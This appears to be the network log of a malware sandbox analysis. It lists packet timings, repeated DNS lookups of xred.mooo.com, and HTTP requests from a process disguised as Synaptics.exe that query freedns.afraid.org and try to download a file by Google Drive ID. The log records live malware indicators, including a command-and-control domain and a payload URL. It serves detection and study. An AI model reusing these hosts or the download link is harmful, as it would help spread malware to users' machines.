                                                                                            Jan 2, 2025 20:30:09.060672045 CET50133443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.104113102 CET50133443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.104139090 CET44350133172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.105350971 CET50139443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.105391026 CET44350139172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.105648041 CET50139443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.107402086 CET50139443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.107424021 CET44350139172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.110184908 CET44350134172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.110414028 CET50134443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.110438108 CET44350134172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.110529900 CET50134443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.110534906 CET44350134172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.110553026 CET44350134172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.110788107 CET50134443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.110788107 CET50134443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.144380093 CET44350135216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.144418955 CET44350135216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.144447088 CET50135443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.144474030 CET44350135216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.144490957 CET50135443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.144520998 CET50135443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.144526958 CET44350135216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.144546032 CET44350135216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.144570112 CET50135443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.144584894 CET50135443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.168497086 CET50134443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.168548107 CET44350134172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.169431925 CET50140443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.169462919 CET44350140172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.169802904 CET50140443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.170037985 CET50140443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:09.170051098 CET44350140172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.171339035 CET50135443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.171348095 CET44350135216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.172262907 CET50141443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.172305107 CET44350141216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.173295021 CET50141443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.175719976 CET50141443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.175739050 CET44350141216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.300308943 CET44350136216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.300363064 CET50136443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.300389051 CET44350136216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.300436020 CET50136443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.300441027 CET44350136216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.300510883 CET50136443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.300514936 CET44350136216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.300523996 CET44350136216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.300560951 CET50136443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.301179886 CET50136443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.301192999 CET44350136216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.301786900 CET50142443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.301824093 CET44350142216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:09.301882029 CET50142443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.302253962 CET50142443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:09.302262068 CET44350142216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.119515896 CET44350155172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.119653940 CET50155443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.120942116 CET44350155172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.120999098 CET50155443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.122997046 CET50155443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.123007059 CET44350155172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.123266935 CET44350155172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.123333931 CET50155443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.123830080 CET50155443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.167326927 CET44350155172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.237427950 CET44350156216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.239172935 CET50156443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.239172935 CET50156443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.239172935 CET50156443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.239193916 CET44350156216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.239207983 CET44350156216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.518800020 CET44350155172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.518871069 CET50155443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.518893957 CET44350155172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.518985987 CET50155443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.519167900 CET50155443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.519203901 CET44350155172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.519258022 CET50155443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.519814014 CET50159443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.519860029 CET44350159172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.519912958 CET50159443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.520183086 CET50159443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.520194054 CET44350159172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.698694944 CET44350157172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.698759079 CET50157443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.699846029 CET44350157172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.699914932 CET50157443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.701798916 CET50157443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.701807022 CET44350157172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.702099085 CET44350157172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.702208996 CET50157443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.702639103 CET50157443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.743331909 CET44350157172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.764269114 CET44350158216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.764327049 CET50158443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.764967918 CET50158443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.764977932 CET44350158216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.765253067 CET50158443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.765259027 CET44350158216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.806462049 CET50156443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.806540966 CET50159443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.806571007 CET50157443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.806601048 CET50158443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.807180882 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.807229042 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.807292938 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.808629036 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:13.808646917 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.810496092 CET50161443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.810527086 CET44350161172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.810686111 CET50161443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.811769009 CET50161443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.811780930 CET44350161172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.812426090 CET50162443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.812459946 CET44350162172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:13.812606096 CET50162443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.813909054 CET50162443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:13.813919067 CET44350162172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.452747107 CET44350162172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.453037977 CET50162443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.453375101 CET50162443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.453383923 CET44350162172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.455256939 CET50162443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.455260992 CET44350162172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.462512016 CET44350161172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.462569952 CET50161443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.463135004 CET50161443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.463135004 CET50161443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.463141918 CET44350161172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.463152885 CET44350161172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.465186119 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.465274096 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.465574980 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.465581894 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.467387915 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.467396021 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.849359035 CET44350161172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.849484921 CET50161443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.849503994 CET44350161172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.849680901 CET50161443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.849877119 CET50161443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.849908113 CET44350161172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.849994898 CET50161443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.850739956 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.850774050 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.851144075 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.851176023 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.851193905 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.851221085 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.851449013 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.851460934 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.851703882 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.851715088 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.926594973 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.926645041 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.926662922 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.926697016 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.926708937 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.926742077 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.926750898 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.926770926 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.926795959 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.926820040 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.927793980 CET50160443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.927807093 CET44350160216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.931432009 CET44350162172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.931493044 CET50162443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.931638002 CET50162443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.931669950 CET44350162172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.931839943 CET44350162172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.931942940 CET50162443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.931942940 CET50162443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.932380915 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.932400942 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.932478905 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.932631016 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.932673931 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.932730913 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.932857037 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.932866096 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.932995081 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.933007002 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.485888004 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.488202095 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.488723040 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.488739967 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.488960028 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.488974094 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.491637945 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.491719961 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.492417097 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.492468119 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.494550943 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.494563103 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.494858980 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.494945049 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.495414019 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.543338060 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.574760914 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.574815989 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.575330973 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.575336933 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.575829029 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.575839043 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.590496063 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.590574980 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.591255903 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.591310978 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.593060970 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.593070984 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.593316078 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.593354940 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.593672037 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.639333963 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.883900881 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.883975029 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.883977890 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.884078979 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.901578903 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.901602983 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.902622938 CET50170443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.902714014 CET44350170172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.902810097 CET50170443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.903347969 CET50170443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.903383970 CET44350170172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.980974913 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.981053114 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.981071949 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.981303930 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.981360912 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.981401920 CET44350166172.217.18.14192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 2, 2025 20:29:36.022766113 CET | 192.168.2.9 | 1.1.1.1 | 0x6bc8 | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:36.838140011 CET | 192.168.2.9 | 1.1.1.1 | 0x8826 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:36.854108095 CET | 192.168.2.9 | 1.1.1.1 | 0xdf22 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:37.149348021 CET | 192.168.2.9 | 1.1.1.1 | 0x77c4 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:40.939296007 CET | 192.168.2.9 | 1.1.1.1 | 0xdea6 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:46.620368958 CET | 192.168.2.9 | 1.1.1.1 | 0xe419 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:51.139348030 CET | 192.168.2.9 | 1.1.1.1 | 0xdd16 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:56.964132071 CET | 192.168.2.9 | 1.1.1.1 | 0x6ec4 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:30:03.933608055 CET | 192.168.2.9 | 1.1.1.1 | 0x98e5 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:30:10.825476885 CET | 192.168.2.9 | 1.1.1.1 | 0xe333 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:30:15.386799097 CET | 192.168.2.9 | 1.1.1.1 | 0x7e69 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 2, 2025 20:29:20.876027107 CET | 1.1.1.1 | 192.168.2.9 | 0xde0d | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 2, 2025 20:29:20.876027107 CET | 1.1.1.1 | 192.168.2.9 | 0xde0d | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:36.029284000 CET | 1.1.1.1 | 192.168.2.9 | 0x6bc8 | No error (0) | docs.google.com | | 172.217.18.14 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:36.845707893 CET | 1.1.1.1 | 192.168.2.9 | 0x8826 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:36.861382961 CET | 1.1.1.1 | 192.168.2.9 | 0xdf22 | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:37.156500101 CET | 1.1.1.1 | 192.168.2.9 | 0x77c4 | No error (0) | drive.usercontent.google.com | | 216.58.206.65 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:40.946362972 CET | 1.1.1.1 | 192.168.2.9 | 0xdea6 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:46.627355099 CET | 1.1.1.1 | 192.168.2.9 | 0xe419 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:51.146516085 CET | 1.1.1.1 | 192.168.2.9 | 0xdd16 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:29:57.112943888 CET | 1.1.1.1 | 192.168.2.9 | 0x6ec4 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:30:03.941279888 CET | 1.1.1.1 | 192.168.2.9 | 0x98e5 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:30:10.832511902 CET | 1.1.1.1 | 192.168.2.9 | 0xe333 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:30:15.394491911 CET | 1.1.1.1 | 192.168.2.9 | 0x7e69 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:30:39.312104940 CET | 1.1.1.1 | 192.168.2.9 | 0xf61a | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 2, 2025 20:30:39.312104940 CET | 1.1.1.1 | 192.168.2.9 | 0xf61a | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false

                                                                                            • docs.google.com
                                                                                            • drive.usercontent.google.com
                                                                                            • freedns.afraid.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49797 | 69.42.215.252 | 80 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 20:29:36.867754936 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache
Jan 2, 2025 20:29:37.479986906 CET | 243 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Jan 2025 19:29:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49788 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:36 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2025-01-02 19:29:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 02 Jan 2025 19:29:36 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce-4inL9mhOH5dhINdFXB-jfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49789 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:36 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
